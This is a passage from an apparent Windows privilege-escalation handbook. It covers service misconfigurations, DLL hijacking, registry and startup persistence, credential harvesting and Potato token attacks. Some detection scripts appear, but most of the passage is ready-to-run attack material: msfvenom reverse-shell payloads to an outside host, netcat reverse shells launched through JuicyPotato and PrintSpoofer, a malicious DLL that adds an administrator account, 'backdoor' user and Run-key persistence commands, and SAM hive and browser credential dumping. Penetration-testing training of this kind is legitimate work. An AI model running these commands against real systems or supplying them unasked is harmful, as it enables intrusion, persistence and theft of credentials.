{$_.PathName -ne $null} 837 838 foreach ($service in $services) { 839 $path = $service.PathName 840 841 # Skip quoted paths 842 if ($path.StartsWith('"')) { continue } 843 844 # Skip paths without spaces 845 if ($path -notmatch '\s') { continue } 846 847 # Skip Windows directory 848 if ($path -match '^C:\\Windows') { continue } 849 850 # Extract unquoted portion (before any arguments) 851 if ($path -match '^([^"]+\.exe)') { 852 $exePath = $Matches[1] 853 854 # Find potential hijack locations 855 $parts = $exePath -split '\\' 856 $testPath = "" 857 858 for ($i = 0; $i -lt $parts.Count - 1; $i++) { 859 $testPath += $parts[$i] 860 if ($testPath -match '\s') { 861 $hijackPath = ($testPath -split '\s')[0] + ".exe" 862 863 # Check write permissions 864 $parentDir = Split-Path $hijackPath -Parent 865 if (Test-Path $parentDir) { 866 $acl = Get-Acl $parentDir 867 foreach ($ace in $acl.Access) { 868 if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 869 $ace.IdentityReference -match 'Users|Everyone|Authenticated') { 870 Write-Host "[VULN] $($service.Name): $hijackPath" -ForegroundColor Red 871 Write-Host " Writable by: $($ace.IdentityReference)" -ForegroundColor Yellow 872 } 873 } 874 } 875 } 876 $testPath += "\" 877 } 878 } 879 } 880 } 881 882 Find-UnquotedPaths 883 ``` 884 885 ### 3.1.3 Weak Service Permissions 886 887 Services with weak DACLs allow unprivileged users to modify service configuration. 888 889 **Detection:** 890 891 ```batch 892 :: Using accesschk (Sysinternals) 893 accesschk.exe /accepteula -uwcqv "Authenticated Users" * 894 accesschk.exe /accepteula -uwcqv "Users" * 895 accesschk.exe /accepteula -uwcqv "%USERNAME%" * 896 ``` 897 898 **Permission Meanings:** 899 900 | Permission | Code | Exploitation | 901 |------------|------|--------------| 902 | SERVICE_ALL_ACCESS | F | Full control - can modify everything | 903 | SERVICE_CHANGE_CONFIG | WP | Can change binary path | 904 | SERVICE_START | RP | Can start the service | 905 | SERVICE_STOP | WP | Can stop the service | 906 | WRITE_DAC | WD | Can modify service permissions | 907 | WRITE_OWNER | WO | Can take ownership | 908 909 **Exploitation with sc.exe:** 910 911 ```batch 912 :: Verify current config 913 sc qc "VulnerableService" 914 915 :: Modify binary path to add user 916 sc config "VulnerableService" binpath= "cmd /c net localgroup administrators YOUR_USER /add" 917 918 :: Restart service 919 sc stop "VulnerableService" 920 sc start "VulnerableService" 921 922 :: Verify exploitation 923 net localgroup administrators 924 ``` 925 926 **Exploitation with PowerShell:** 927 928 ```powershell 929 # Modify service ImagePath via registry 930 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService" -Name "ImagePath" -Value "C:\temp\payload.exe" 931 932 # Restart service 933 Restart-Service -Name "VulnerableService" -Force 934 ``` 935 936 **Reverse Shell Payload:** 937 938 ```batch 939 :: Generate payload 940 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe-service -o service_payload.exe 941 942 :: Modify service 943 sc config "VulnerableService" binpath= "C:\temp\service_payload.exe" 944 sc stop "VulnerableService" 945 sc start "VulnerableService" 946 ``` 947 948 ### 3.1.4 Weak Service Binary Permissions 949 950 If the service binary itself is writable, it can be replaced with a malicious executable. 951 952 **Detection:** 953 954 ```batch 955 :: Check binary permissions 956 icacls "C:\Program Files\VulnerableApp\service.exe" 957 accesschk.exe /accepteula -quvw "C:\Program Files\VulnerableApp\service.exe" 958 ``` 959 960 ```powershell 961 # Find writable service binaries 962 Get-CimInstance Win32_Service | ForEach-Object { 963 $path = ($_.PathName -split '"')[1] 964 if (!$path) { $path = ($_.PathName -split ' ')[0] } 965 966 if (Test-Path $path) { 967 $acl = Get-Acl $path 968 foreach ($ace in $acl.Access) { 969 if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 970 $ace.IdentityReference -match 'Users|Everyone|Authenticated') { 971 Write-Host "[VULN] $($_.Name): $path" -ForegroundColor Red 972 Write-Host " Writable by: $($ace.IdentityReference)" -ForegroundColor Yellow 973 } 974 } 975 } 976 } 977 ``` 978 979 **Exploitation:** 980 981 ```batch 982 :: Backup original binary 983 copy "C:\Program Files\VulnerableApp\service.exe" "C:\temp\service.exe.bak" 984 985 :: Replace with malicious binary 986 copy /Y payload.exe "C:\Program Files\VulnerableApp\service.exe" 987 988 :: Restart service 989 sc stop "VulnerableService" 990 sc start "VulnerableService" 991 ``` 992 993 ### 3.1.5 Weak Service Registry Permissions 994 995 The service configuration in the registry may be modifiable even if the service DACL is secure. 996 997 **Detection:** 998 999 ```batch 1000 :: Check registry permissions 1001 accesschk.exe /accepteula -kvuqsw "Authenticated Users" hklm\System\CurrentControlSet\Services 1002 accesschk.exe /accepteula -kvuqsw "Users" hklm\System\CurrentControlSet\Services 1003 ``` 1004 1005 ```powershell 1006 # Check specific service registry permissions 1007 $services = Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" 1008 foreach ($service in $services) { 1009 $acl = Get-Acl $service.PSPath 1010 foreach ($ace in $acl.Access) { 1011 if ($ace.RegistryRights -match 'FullControl|SetValue' -and 1012 $ace.IdentityReference -match 'Users|Everyone|Authenticated') { 1013 Write-Host "[VULN] $($service.PSChildName)" -ForegroundColor Red 1014 Write-Host " Modifiable by: $($ace.IdentityReference)" -ForegroundColor Yellow 1015 } 1016 } 1017 } 1018 ``` 1019 1020 **Exploitation:** 1021 1022 ```powershell 1023 # Modify ImagePath 1024 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService" -Name "ImagePath" -Value "C:\temp\payload.exe" 1025 1026 # Restart service 1027 Restart-Service "VulnerableService" 1028 ``` 1029 1030 ## 3.2 DLL Hijacking 1031 1032 DLL hijacking exploits Windows' DLL search order to load malicious libraries instead of legitimate ones. 1033 1034 ### 3.2.1 Windows DLL Search Order 1035 1036 When an application loads a DLL without specifying the full path, Windows searches in this order: 1037 1038 1. **Known DLLs**: `HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs` 1039 2. **Application directory**: Directory containing the executable 1040 3. **System directory**: `C:\Windows\System32` 1041 4. **16-bit system directory**: `C:\Windows\System` 1042 5. **Windows directory**: `C:\Windows` 1043 6. **Current directory**: Process's current working directory 1044 7. **PATH directories**: Directories in the PATH environment variable 1045 1046 **Safe DLL Search Mode (default enabled):** 1047 When enabled, the current directory is searched after system directories. 1048 1049 ### 3.2.2 Finding DLL Hijacking Opportunities 1050 1051 **Using Process Monitor (Procmon):** 1052 1053 ``` 1054 1. Launch Procmon as Administrator 1055 2. Set filters: 1056 - Operation is CreateFile 1057 - Result is NAME NOT FOUND 1058 - Path ends with .dll 1059 3. Run target application 1060 4. Analyze missing DLLs in writable locations 1061 ``` 1062 1063 **Automated Detection Script:** 1064 1065 ```powershell 1066 # Find applications loading DLLs from writable locations 1067 function Find-DLLHijack { 1068 param([string]$ProcessName) 1069 1070 # Get process info 1071 $proc = Get-Process -Name $ProcessName -ErrorAction SilentlyContinue 1072 if (!$proc) { 1073 Write-Host "Process not found" -ForegroundColor Red 1074 return 1075 } 1076 1077 # Get loaded modules 1078 $modules = $proc.Modules 1079 1080 foreach ($module in $modules) { 1081 $path = $module.FileName 1082 $dir = Split-Path $path -Parent 1083 1084 # Check if directory is writable 1085 try { 1086 $acl = Get-Acl $dir 1087 foreach ($ace in $acl.Access) { 1088 if ($ace.FileSystemRights -match 'Write|FullControl|Modify' -and 1089 $ace.IdentityReference -match 'Users|Everyone|Authenticated') { 1090 Write-Host "[VULN] $path" -ForegroundColor Red 1091 Write-Host " Directory writable by: $($ace.IdentityReference)" -ForegroundColor Yellow 1092 } 1093 } 1094 } catch {} 1095 } 1096 } 1097 ``` 1098 1099 ### 3.2.3 Phantom DLL Hijacking 1100 1101 Some applications attempt to load DLLs that don't exist on the system. If the search path includes a writable directory, an attacker can plant a malicious DLL. 1102 1103 **Common Phantom DLLs:** 1104 1105 | Application | Missing DLL | Write Location | 1106 |-------------|-------------|----------------| 1107 | Many .NET apps | CRYPTSP.dll, CRYPTBASE.dll | Application directory | 1108 | Office applications | Various plugin DLLs | AppData directories | 1109 | Custom applications | Application-specific | Application directory | 1110 1111 **Creating Malicious DLL:** 1112 1113 ```c 1114 // dllmain.cpp - Minimal DLL payload 1115 #include <windows.h> 1116 #include <stdlib.h> 1117 1118 BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 1119 switch (ul_reason_for_call) { 1120 case DLL_PROCESS_ATTACH: 1121 // Execute payload once when DLL is loaded 1122 system("cmd.exe /c net localgroup administrators YOUR_USER /add"); 1123 break; 1124 case DLL_THREAD_ATTACH: 1125 case DLL_THREAD_DETACH: 1126 case DLL_PROCESS_DETACH: 1127 break; 1128 } 1129 return TRUE; 1130 } 1131 ``` 1132 1133 **Compiling with Visual Studio:** 1134 1135 ```batch 1136 cl.exe /LD /Fe:malicious.dll dllmain.cpp 1137 ``` 1138 1139 **Using msfvenom:** 1140 1141 ```bash 1142 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f dll -o malicious.dll 1143 ``` 1144 1145 ### 3.2.4 DLL Proxying/Sideloading 1146 1147 DLL proxying creates a malicious DLL that forwards legitimate function calls to the original DLL while executing malicious code. 1148 1149 **Steps:** 1150 1. Identify target DLL and its exports 1151 2. Create proxy DLL that exports same functions 1152 3. Proxy forwards calls to renamed original DLL 1153 4. Inject payload in DllMain 1154 1155 **Using SharpDLLProxy:** 1156 1157 ```batch 1158 :: Generate proxy DLL 1159 SharpDLLProxy.exe --dll C:\Windows\System32\version.dll --output-dir C:\temp\proxy 1160 ``` 1161 1162 ## 3.3 Registry Exploits 1163 1164 ### 3.3.1 AlwaysInstallElevated 1165 1166 When enabled, MSI packages install with SYSTEM privileges regardless of the user running them. 1167 1168 **Detection:** 1169 1170 ```batch 1171 :: Check both registry keys (both must be set to 1) 1172 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 1173 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 1174 ``` 1175 1176 ```powershell 1177 # PowerShell check 1178 $hkcu = Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue 1179 $hklm = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue 1180 1181 if ($hkcu.AlwaysInstallElevated -eq 1 -and $hklm.AlwaysInstallElevated -eq 1) { 1182 Write-Host "[VULN] AlwaysInstallElevated is enabled!" -ForegroundColor Red 1183 } 1184 ``` 1185 1186 **Exploitation:** 1187 1188 ```bash 1189 # Generate malicious MSI 1190 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi 1191 ``` 1192 1193 ```batch 1194 :: Install MSI silently 1195 msiexec /quiet /qn /i evil.msi 1196 ``` 1197 1198 ### 3.3.2 Autorun Registry Keys 1199 1200 **Common Autorun Locations:** 1201 1202 | Registry Key | Run Context | 1203 |--------------|-------------| 1204 | `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` | Current user logon | 1205 | `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` | Current user (once) | 1206 | `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` | All users logon | 1207 | `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` | All users (once) | 1208 | `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices` | Service startup | 1209 | `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup` | Startup folder path | 1210 1211 **Detection:** 1212 1213 ```powershell 1214 # Check for writable autorun entries 1215 $autorunPaths = @( 1216 "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run", 1217 "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce", 1218 "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run", 1219 "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce" 1220 ) 1221 1222 foreach ($path in $autorunPaths) { 1223 if (Test-Path $path) { 1224 $props = Get-ItemProperty $path 1225 $props.PSObject.Properties | Where-Object {$_.Name -notmatch '^PS'} | ForEach-Object { 1226 $target = $_.Value -replace '"', '' 1227 if (Test-Path $target) { 1228 $acl = Get-Acl $target 1229 foreach ($ace in $acl.Access) { 1230 if ($ace.FileSystemRights -match 'Write|FullControl|Modify') { 1231 Write-Host "[VULN] $($_.Name): $target" -ForegroundColor Red 1232 } 1233 } 1234 } 1235 } 1236 } 1237 } 1238 ``` 1239 1240 **Exploitation:** 1241 1242 ```powershell 1243 # Add malicious autorun entry 1244 Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\temp\payload.exe" 1245 1246 # Or modify existing writable binary 1247 # (replace legitimate autorun binary with payload) 1248 ``` 1249 1250 ### 3.3.3 Startup Folder Exploitation 1251 1252 **Startup Folder Locations:** 1253 1254 | Location | Affects | 1255 |----------|---------| 1256 | `C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` | Single user | 1257 | `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` | All users | 1258 1259 **Detection:** 1260 1261 ```powershell 1262 # Check startup folders 1263 $startupPaths = @( 1264 "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup", 1265 "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" 1266 ) 1267 1268 foreach ($path in $startupPaths) { 1269 Write-Host "`nChecking: $path" -ForegroundColor Cyan 1270 $acl = Get-Acl $path 1271 $acl.Access | Where-Object {$_.FileSystemRights -match 'Write|FullControl|Modify'} | 1272 ForEach-Object { Write-Host " Writable by: $($_.IdentityReference)" -ForegroundColor Yellow } 1273 } 1274 ``` 1275 1276 **Exploitation:** 1277 1278 ```batch 1279 :: Place payload in startup folder 1280 copy payload.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" 1281 ``` 1282 1283 --- 1284 1285 # IV. Credential Harvesting & Secrets 1286 1287 ## 4.1 File-Based Credential Discovery 1288 1289 ### 4.1.1 Common Credential File Locations 1290 1291 **Configuration Files:** 1292 1293 | File Type | Common Locations | Content Type | 1294 |-----------|------------------|--------------| 1295 | web.config | `C:\inetpub\wwwroot\` | Database connection strings | 1296 | appsettings.json | Application directories | API keys, credentials | 1297 | .env files | Application roots | Environment variables | 1298 | unattend.xml | `C:\Windows\Panther\` | Setup credentials | 1299 | sysprep.xml | `C:\Windows\Panther\` | Admin password (base64) | 1300 | .rdp files | User directories | Saved RDP credentials | 1301 | .vnc files | User directories | VNC passwords | 1302 | .config files | Application directories | Various credentials | 1303 1304 **Search Commands:** 1305 1306 ```batch 1307 :: Search for password in files 1308 findstr /si password *.txt *.xml *.ini *.config *.cfg 1309 findstr /spin "password" *.* 1310 cd c:\Users\%USERNAME%\Documents & findstr /SI /M "password" *.xml *.ini *.txt 1311 1312 :: Search for specific file types 1313 dir /s /b *pass*.txt *pass*.xml *pass*.ini *cred* *vnc* *.config 1314 where /R C:\ *.config 1315 where /R C:\ unattend.xml 1316 where /R C:\ sysprep.xml 1317 ``` 1318 1319 ```powershell 1320 # PowerShell comprehensive search 1321 $searchTerms = @("password", "passwd", "pwd", "credentials", "secret", "api_key", "apikey", "connection") 1322 $extensions = @("*.txt", "*.xml", "*.ini", "*.config", "*.cfg", "*.json", "*.ps1", "*.bat", "*.cmd") 1323 1324 foreach ($ext in $extensions) { 1325 Get-ChildItem -Path C:\ -Include $ext -Recurse -ErrorAction SilentlyContinue | 1326 ForEach-Object { 1327 $content = Get-Content $_.FullName -ErrorAction SilentlyContinue 1328 foreach ($term in $searchTerms) { 1329 if ($content -match $term) { 1330 Write-Host "[FOUND] $($_.FullName)" -ForegroundColor Green 1331 $content | Select-String -Pattern $term | ForEach-Object { Write-Host " $_" } 1332 } 1333 } 1334 } 1335 } 1336 ``` 1337 1338 ### 4.1.2 Unattend.xml and Sysprep Credentials 1339 1340 **Common Locations:** 1341 ``` 1342 C:\unattend.xml 1343 C:\Windows\Panther\unattend.xml 1344 C:\Windows\Panther\Unattend\unattend.xml 1345 C:\Windows\system32\sysprep.inf 1346 C:\Windows\system32\sysprep\sysprep.xml 1347 ``` 1348 1349 **Extraction:** 1350 1351 ```powershell 1352 # Search for unattend files 1353 Get-ChildItem C:\ -Recurse -Include unattend.xml,sysprep.xml,sysprep.inf -ErrorAction SilentlyContinue | 1354 ForEach-Object { 1355 Write-Host "[FOUND] $($_.FullName)" -ForegroundColor Green 1356 $content = Get-Content $_.FullName 1357 # Look for password elements 1358 $content | Select-String -Pattern "Password|AdministratorPassword|AutoLogon" -Context 0,2 1359 } 1360 ``` 1361 1362 **Decode Base64 Password:** 1363 1364 ```powershell 1365 # If password is base64 encoded 1366 $encoded = "UABhAHMAcwB3AG8AcgBkADEAMgAzACEA" 1367 [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded)) 1368 ``` 1369 1370 ### 4.1.3 IIS Web.config Files 1371 1372 ```powershell 1373 # Search for web.config files 1374 Get-ChildItem -Path C:\inetpub -Include web.config -Recurse -ErrorAction SilentlyContinue | 1375 ForEach-Object { 1376 Write-Host "`n[FOUND] $($_.FullName)" -ForegroundColor Green 1377 $content = Get-Content $_.FullName 1378 1379 # Extract connection strings 1380 $content | Select-String -Pattern "connectionString|password|pwd|user id|data source" | 1381 ForEach-Object { Write-Host " $_" } 1382 } 1383 ``` 1384 1385 ## 4.2 Windows Credential Manager 1386 1387 ### 4.2.1 Cmdkey Enumeration 1388 1389 ```batch 1390 :: List stored credentials 1391 cmdkey /list 1392 ``` 1393 1394 **Output Analysis:** 1395 1396 ``` 1397 Target: Domain:interactive=DOMAIN\Administrator 1398 Type: Domain Password 1399 User: DOMAIN\Administrator 1400 ``` 1401 1402 **Credential Usage:** 1403 1404 ```batch 1405 :: Run command as stored user 1406 runas /savecred /user:DOMAIN\Administrator cmd.exe 1407 1408 :: Use with saved credentials 1409 runas /savecred /user:Administrator "cmd.exe /c whoami > C:\temp\whoami.txt" 1410 ``` 1411 1412 ### 4.2.2 Windows Vault 1413 1414 ```powershell 1415 # List vault credentials 1416 vaultcmd /listcreds:"Windows Credentials" /all 1417 vaultcmd /listcreds:"Web Credentials" /all 1418 1419 # Using PowerShell 1420 [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 1421 $vault = New-Object Windows.Security.Credentials.PasswordVault 1422 $vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ } 1423 ``` 1424 1425 ## 4.3 PowerShell Credential Storage 1426 1427 ### 4.3.1 PowerShell History 1428 1429 ```powershell 1430 # Get history file path 1431 (Get-PSReadLineOption).HistorySavePath 1432 1433 # Read history file 1434 Get-Content (Get-PSReadLineOption).HistorySavePath 1435 1436 # Search for credentials in history 1437 Get-Content (Get-PSReadLineOption).HistorySavePath | Select-String -Pattern "password|credential|secret" 1438 1439 # Alternative history location 1440 Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 1441 ``` 1442 1443 ### 4.3.2 PowerShell Secure Strings 1444 1445 ```powershell 1446 # Find XML credential files 1447 Get-ChildItem -Path C:\Users -Include *.xml -Recurse -ErrorAction SilentlyContinue | 1448 Where-Object { (Get-Content $_) -match "SecureString|PSCredential" } 1449 1450 # Decrypt SecureString (only works for same user) 1451 $credential = Import-Clixml -Path "C:\scripts\cred.xml" 1452 $credential.GetNetworkCredential().Password 1453 $credential.GetNetworkCredential().UserName 1454 ``` 1455 1456 ## 4.4 SAM and SYSTEM Registry Hives 1457 1458 ### 4.4.1 Checking for Backup Files 1459 1460 ```batch 1461 :: Common backup locations 1462 dir C:\Windows\Repair\SAM 1463 dir C:\Windows\Repair\SYSTEM 1464 dir C:\Windows\System32\config\RegBack\SAM 1465 dir C:\Windows\System32\config\RegBack\SYSTEM 1466 ``` 1467 1468 ### 4.4.2 Volume Shadow Copy Extraction 1469 1470 ```powershell 1471 # List shadow copies 1472 vssadmin list shadows 1473 1474 # Access shadow copy 1475 cmd /c "mklink /d C:\ShadowCopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\" 1476 1477 # Copy from shadow 1478 copy C:\ShadowCopy\Windows\System32\config\SAM C:\temp\SAM 1479 copy C:\ShadowCopy\Windows\System32\config\SYSTEM C:\temp\SYSTEM 1480 ``` 1481 1482 ### 4.4.3 Registry Save Method (Requires Admin) 1483 1484 ```batch 1485 :: Save registry hives 1486 reg save HKLM\SAM C:\temp\SAM 1487 reg save HKLM\SYSTEM C:\temp\SYSTEM 1488 reg save HKLM\SECURITY C:\temp\SECURITY 1489 ``` 1490 1491 ### 4.4.4 Hash Extraction 1492 1493 ```bash 1494 # Using impacket-secretsdump (on attacker machine) 1495 impacket-secretsdump -sam SAM -system SYSTEM LOCAL 1496 1497 # Using pypykatz 1498 pypykatz registry --sam SAM --system SYSTEM 1499 ``` 1500 1501 ## 4.5 Browser Credential Extraction 1502 1503 ### 4.5.1 Chrome Credentials 1504 1505 ```powershell 1506 # Chrome login data location 1507 $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" 1508 1509 # Check for custom dictionary (may contain passwords) 1510 Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Custom Dictionary.txt" | 1511 Select-String -Pattern "password|pass" 1512 ``` 1513 1514 **Using SharpChrome:** 1515 1516 ```batch 1517 .\SharpChrome.exe logins /unprotect 1518 .\SharpChrome.exe cookies /unprotect 1519 ``` 1520 1521 ### 4.5.2 Firefox Credentials 1522 1523 ```powershell 1524 # Firefox profile location 1525 $firefoxProfiles = "$env:APPDATA\Mozilla\Firefox\Profiles" 1526 Get-ChildItem $firefoxProfiles 1527 1528 # Key files 1529 # logins.json - Encrypted login data 1530 # key4.db - Encryption key database 1531 ``` 1532 1533 ### 4.5.3 LaZagne All-in-One 1534 1535 ```batch 1536 :: Run all credential recovery modules 1537 .\lazagne.exe all 1538 1539 :: Specific browser 1540 .\lazagne.exe browsers -chrome 1541 1542 :: Save output 1543 .\lazagne.exe all > credentials.txt 1544 ``` 1545 1546 ## 4.6 WiFi Credentials 1547 1548 ```batch 1549 :: List saved WiFi profiles 1550 netsh wlan show profiles 1551 1552 :: Show password for specific profile 1553 netsh wlan show profile name="NetworkName" key=clear 1554 ``` 1555 1556 ```powershell 1557 # Extract all WiFi passwords 1558 (netsh wlan show profiles) | Select-String "All User Profile" | ForEach-Object { 1559 $profile = ($_ -split ":")[1].Trim() 1560 $password = (netsh wlan show profile name="$profile" key=clear) | Select-String "Key Content" 1561 if ($password) { 1562 Write-Host "$profile : $(($password -split ':')[1].Trim())" 1563 } 1564 } 1565 ``` 1566 1567 ## 4.7 SessionGopher for Remote Access Tools 1568 1569 ```powershell 1570 # Import and run SessionGopher 1571 Import-Module .\SessionGopher.ps1 1572 Invoke-SessionGopher -Thorough 1573 1574 # Target specific computer 1575 Invoke-SessionGopher -Target COMPUTERNAME 1576 1577 # Supported tools: 1578 # - PuTTY 1579 # - WinSCP 1580 # - FileZilla 1581 # - SuperPuTTY 1582 # - RDP 1583 ``` 1584 1585 --- 1586 1587 # V. Kernel & OS Vulnerabilities 1588 1589 ## 5.1 Kernel Exploitation in 2025 1590 1591 ### 5.1.1 Risk vs Reward Analysis 1592 1593 **Kernel Exploitation Considerations:** 1594 1595 | Factor | Consideration | 1596 |--------|---------------| 1597 | Stability | Kernel exploits can BSOD the system | 1598 | Detection | Modern EDR monitors kernel behavior | 1599 | Reliability | Exploits often version-specific | 1600 | Necessity | Often not needed if other vectors exist | 1601 | Client Impact | System crash = incident, potential data loss | 1602 1603 **When to Use Kernel Exploits:** 1604 - All other vectors exhausted 1605 - System is known vulnerable and stable exploit exists 1606 - Test environment or explicit client authorization 1607 - Virtual machine snapshots available 1608 1609 ### 5.1.2 Vulnerability Research and Exploit Selection 1610 1611 **Step 1: Gather System Information** 1612 1613 ```batch 1614 systeminfo > systeminfo.txt 1615 ``` 1616 1617 **Step 2: Use Windows Exploit Suggester** 1618 1619 ```bash 1620 # Update database 1621 python windows-exploit-suggester.py --update 1622 1623 # Run analysis 1624 python windows-exploit-suggester.py --database 2025-01-01-mssb.xls --systeminfo systeminfo.txt 1625 ``` 1626 1627 **Step 3: Use Watson (On-Target)** 1628 1629 ```batch 1630 .\Watson.exe 1631 ``` 1632 1633 ### 5.1.3 Notable Windows Vulnerabilities (2019-2025) 1634 1635 **Legacy/High Detection (Educational):** 1636 1637 | CVE | Name | Affected | Notes | 1638 |-----|------|----------|-------| 1639 | CVE-2020-0796 | SMBGhost | Windows 10 1903/1909, Server 2019 | RCE via SMBv3 | 1640 | CVE-2020-1472 | Zerologon | All DC versions | Domain compromise | 1641 | CVE-2021-1675/34527 | PrintNightmare | All Windows | Print Spooler RCE | 1642 | CVE-2021-36934 | HiveNightmare/SeriousSAM | Windows 10 | SAM file access | 1643 | CVE-2022-21999 | SpoolFool | Windows 10/11, Server | Print Spooler LPE | 1644 1645 **Modern Vulnerabilities (Check patch status):** 1646 1647 | CVE | Name | Affected | PrivEsc Type | 1648 |-----|------|----------|--------------| 1649 | CVE-2023-36802 | StreamingLocator | Windows 11 | MSKSSRV LPE | 1650 | CVE-2024-21338 | AppLocker Bypass | Windows 10/11 | Driver LPE | 1651 | CVE-2024-26169 | MsiExec Elevation | Windows 10/11 | MSI LPE | 1652 | CVE-2024-30088 | Win32k | Windows 11 | Kernel LPE | 1653 1654 ### 5.1.4 Safe Exploitation Practices 1655 1656 ```powershell 1657 # Pre-exploitation checks 1658 # 1. Verify exact Windows version 1659 [System.Environment]::OSVersion.Version 1660 (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").CurrentBuild 1661 1662 # 2. Check if patch is installed 1663 Get-HotFix | Where-Object {$_.HotFixID -eq "KBXXXXXXX"} 1664 1665 # 3. Verify system stability 1666 Get-WmiObject Win32_OperatingSystem | Select-Object LastBootUpTime 1667 1668 # 4. Take note of current state 1669 whoami /all > pre_exploit_state.txt 1670 ``` 1671 1672 **Compilation Environment:** 1673 - Use Visual Studio 2019/2022 matching target architecture 1674 - Test exploits in isolated VMs first 1675 - Keep original exploit source for reference 1676 - Document any modifications made 1677 1678 --- 1679 1680 # VI. Token Manipulation & Potato Attacks 1681 1682 ## 6.1 Theory of Impersonation Privileges 1683 1684 ### 6.1.1 Understanding Token Impersonation 1685 1686 Windows process tokens contain account security information. When a user authenticates, Windows creates a primary token containing: 1687 - User SID 1688 - Group SIDs 1689 - Privileges 1690 - Integrity level 1691 1692 **Impersonation** allows a thread to assume the security context of another user's token, commonly used by services handling client requests. 1693 1694 ### 6.1.2 Key Privileges for Impersonation 1695 1696 | Privilege | Description | Common Holders | 1697 |-----------|-------------|----------------| 1698 | SeImpersonatePrivilege | Impersonate a client after authentication | IIS AppPool, SQL Server, service accounts | 1699 | SeAssignPrimaryTokenPrivilege | Replace process-level token | Service accounts | 1700 1701 **Verification:** 1702 1703 ```batch 1704 whoami /priv | findstr "Impersonate\|AssignPrimaryToken" 1705 ``` 1706 1707 ### 6.1.3 Where These Privileges Appear 1708 1709 - **IIS Application Pools**: Web shells often have SeImpersonate 1710 - **MSSQL with xp_cmdshell**: SQL service accounts 1711 - **Scheduled tasks**: Tasks running as service accounts 1712 - **Windows services**: Custom service accounts 1713 - **Jenkins/CI systems**: Build agents 1714 1715 ## 6.2 Evolution of Potato Attacks 1716 1717 ### 6.2.1 Attack Family Timeline 1718 1719 | Year | Tool | Method | Windows Support | 1720 |------|------|--------|-----------------| 1721 | 2016 | Hot Potato | NBNS/WPAD | Legacy | 1722 | 2016 | Rotten Potato | DCOM/NTLM | Legacy | 1723 | 2018 | Juicy Potato | DCOM/CLSID | Pre-1809 | 1724 | 2019 | Rogue Potato | Remote OXID | Server 2019 | 1725 | 2020 | PrintSpoofer | Named Pipes | All modern | 1726 | 2020 | Sweet Potato | Combo attack | All modern | 1727 | 2021 | EfsPotato | EFS RPC | All modern | 1728 | 2022 | LocalPotato | NTLM local relay | All modern | 1729 | 2023 | GodPotato | Multiple methods | All modern | 1730 | 2023 | CoercedPotato | Various coercion | All modern | 1731 1732 ### 6.2.2 JuicyPotato (Legacy/Pre-Windows 10 1809) 1733 1734 **Status**: ❌ Blocked on Windows 10 1809+, Server 2019+ 1735 1736 **Usage (Legacy Systems):** 1737 1738 ```batch 1739 :: Basic usage 1740 JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID} 1741 1742 :: With reverse shell 1743 JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe" -t * 1744 1745 :: Common CLSIDs 1746 :: BITS: {4991d34b-80a1-4291-83b6-3328366b9097} 1747 :: WMI: {F3A614DC-ABE0-11d2-A441-00C04F795683} 1748 ``` 1749 1750 ### 6.2.3 PrintSpoofer (Modern Windows) 1751 1752 **Status**: ✅ Works on Windows 10/11, Server 2019/2022/2025 1753 1754 **Requirements**: SeImpersonatePrivilege enabled 1755 1756 ```batch 1757 :: Interactive SYSTEM shell 1758 PrintSpoofer.exe -i -c cmd 1759 1760 :: Execute specific command 1761 PrintSpoofer.exe -c "net user backdoor Password123! /add" 1762 1763 :: Reverse shell 1764 PrintSpoofer.exe -c "c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe" 1765 ``` 1766 1767 ### 6.2.4 GodPotato (Most Reliable 2023+) 1768 1769 **Status**: ✅ Works on 